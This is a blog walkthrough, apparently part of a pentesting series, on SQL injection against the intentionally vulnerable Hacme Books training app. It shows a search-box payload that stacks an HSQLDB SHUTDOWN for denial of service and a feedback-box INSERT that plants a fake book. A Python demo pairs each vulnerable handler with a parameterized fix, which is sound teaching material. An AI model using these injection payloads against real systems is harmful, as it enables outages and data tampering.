Foundstone Hacme Books v2. As a full-featured J2EE application, Hacme Books is representative of real-world J2EE scenarios and demonstrates the security problems that can arise in such applications. To both raise general awareness and still challenge the more advanced developer, Hacme Books was built with several layers of vulnerabilities, from simple implementation issues to more complex design flaws.
Published (last): 19 August 2017
This is the third in a series of five posts on the vulnerable web application Hacme Books. New posts for WebGoat go up every Monday. In this post I discuss a Denial of Service attack.
I use SQL injection as the basic attack technique. The attacker already knew how to attack Hypersonic SQL (HSQLDB) before starting, in particular that it accepts a SHUTDOWN statement that stops the database engine; Google, used for extensive searches on the target system, is the best tool available to hackers.
Most SQL injection vulnerabilities are the result of concatenating user input taken from the application interface directly into SQL statements. The search code takes the keywords typed by the user and turns them into an SQL criteria clause via a method that iterates over the tokenized input, so an attacker can smuggle in extra SQL statements of their own.
A correct SQL statement as generated by the application would look like this:. To turn it into an effective shutdown, the statement should look like this:. Here is how I used this to shut down the database and achieve a DoS.
Note: for this section you will need a valid user account. Use the Signup link on the main page to create one. This time we will not force the system to shut down but simply modify the data, i.e. data tampering. I will add a book title to the website for a book that does not actually exist, which is a rather embarrassing situation for an online book store. To modify data inside a database table the attacker must know the database schema: the structure of the tables and how the data is organized within them.
To add a title that does not exist, I again used SQL injection, but this time with more detailed knowledge of the database schema. Look at the feedback section: a user can leave feedback for a title there. I used the feedback input box to enter an SQL query that adds a new title to the products table. It is a typical SQL INSERT; all we need are the column names and their data types so the query executes without errors.
The purpose of the attack was accomplished: we were able to add a title to the book store's database. The newly added book does not exist and has an embarrassing title. This will certainly make people think twice about buying from this site, because its integrity has been compromised.
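The two injections described in this post (the SHUTDOWN through the search box and the INSERT through the feedback box), modelled as an added example that is not Hacme Books' own code. It is Python against an in-memory SQLite database standing in for Hypersonic SQL; the `products` and `feedback` tables, their columns, the comma-separated tokenization of the search box and all function names are assumptions, not the real Hacme Books schema or code. SQLite has no SHUTDOWN statement, so the DoS half only shows the statement the vulnerable builder would hand to HSQLDB, while the feedback half is executed with `executescript` to emulate a driver that runs several statements from one call. Each vulnerable handler sits beside its parameterized form.

```python
"""Added example, not Hacme Books' own code: two concatenation-style SQL
injection points modelled against an in-memory SQLite database that stands in
for Hypersonic SQL. Schema, tokenisation rule and function names are
assumptions made for illustration."""
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed toy bookstore schema with two sample rows (assumed, not the
    real Hacme Books schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, title TEXT, price REAL);
        CREATE TABLE feedback (id INTEGER PRIMARY KEY, product_id INTEGER,
                               comment TEXT);
        INSERT INTO products VALUES (1, 'Hacking Exposed', 49.99);
        INSERT INTO products VALUES (2, 'Secure Coding in Java', 39.99);
        """
    )
    return conn


# ---- 1. Search box: concatenation lets a SHUTDOWN ride along ----------------

def tokenize(keywords: str) -> list:
    """Assumed tokenisation: the search box is split on commas."""
    return [t.strip() for t in keywords.split(",") if t.strip()]


def vulnerable_search_sql(keywords: str) -> str:
    """The pattern the post describes: iterate over the tokens and concatenate
    each one into a LIKE criterion. Nothing is escaped or bound."""
    criteria = " OR ".join(f"title LIKE '%{tok}%'" for tok in tokenize(keywords))
    return f"SELECT id, title FROM products WHERE {criteria}"


# Closes the open string literal, ends the SELECT, stacks HSQLDB's SHUTDOWN
# statement and comments out the rest of the builder's template.
SHUTDOWN_PAYLOAD = "'; SHUTDOWN; --"


def safe_search(conn: sqlite3.Connection, keywords: str) -> list:
    """Hardened form: one placeholder per token, tokens passed as parameters,
    so the whole payload is merely matched as a (non-existent) title."""
    tokens = tokenize(keywords)
    if not tokens:
        return []
    criteria = " OR ".join("title LIKE ?" for _ in tokens)
    params = [f"%{tok}%" for tok in tokens]
    return conn.execute(
        f"SELECT id, title FROM products WHERE {criteria} ORDER BY id", params
    ).fetchall()


# ---- 2. Feedback box: schema knowledge turns it into an INSERT --------------

def vulnerable_add_feedback(conn: sqlite3.Connection, product_id: int,
                            comment: str) -> None:
    """Concatenates the comment into an INSERT. executescript runs every
    statement in the string, like a driver that accepts stacked statements."""
    sql = ("INSERT INTO feedback (product_id, comment) "
           f"VALUES ({product_id}, '{comment}')")
    conn.executescript(sql)


def safe_add_feedback(conn: sqlite3.Connection, product_id: int,
                      comment: str) -> None:
    """Hardened form: bound parameters, so the comment is stored verbatim."""
    conn.execute("INSERT INTO feedback (product_id, comment) VALUES (?, ?)",
                 (product_id, comment))
    conn.commit()


# Requires the attacker to know the products table's columns and their types.
FEEDBACK_PAYLOAD = ("nice'); INSERT INTO products (id, title, price) "
                    "VALUES (999, 'Book That Does Not Exist', 0.01); --")


def product_titles(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute(
        "SELECT title FROM products ORDER BY id")]


def demo() -> tuple:
    """Push the same payload through both feedback handlers and return
    (titles after vulnerable handler, titles after safe handler, stored comment)."""
    vuln = setup_db()
    vulnerable_add_feedback(vuln, 1, FEEDBACK_PAYLOAD)
    safe = setup_db()
    safe_add_feedback(safe, 1, FEEDBACK_PAYLOAD)
    stored = safe.execute("SELECT comment FROM feedback").fetchone()[0]
    return product_titles(vuln), product_titles(safe), stored


if __name__ == "__main__":
    print(vulnerable_search_sql(SHUTDOWN_PAYLOAD))
    tampered, intact, stored = demo()
    print("after vulnerable feedback handler:", tampered)
    print("after safe feedback handler:", intact, "| stored comment:", stored)
```

Running the script prints the stacked `SELECT ...; SHUTDOWN; --%'` string the search handler would send, then shows the bogus title present in `products` after the concatenating feedback handler and absent after the parameterized one, where the entire payload ends up as an ordinary comment row.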
Join us next Monday for the fourth in the series on Hacme Books.
Web App Pentesting (blog at WordPress).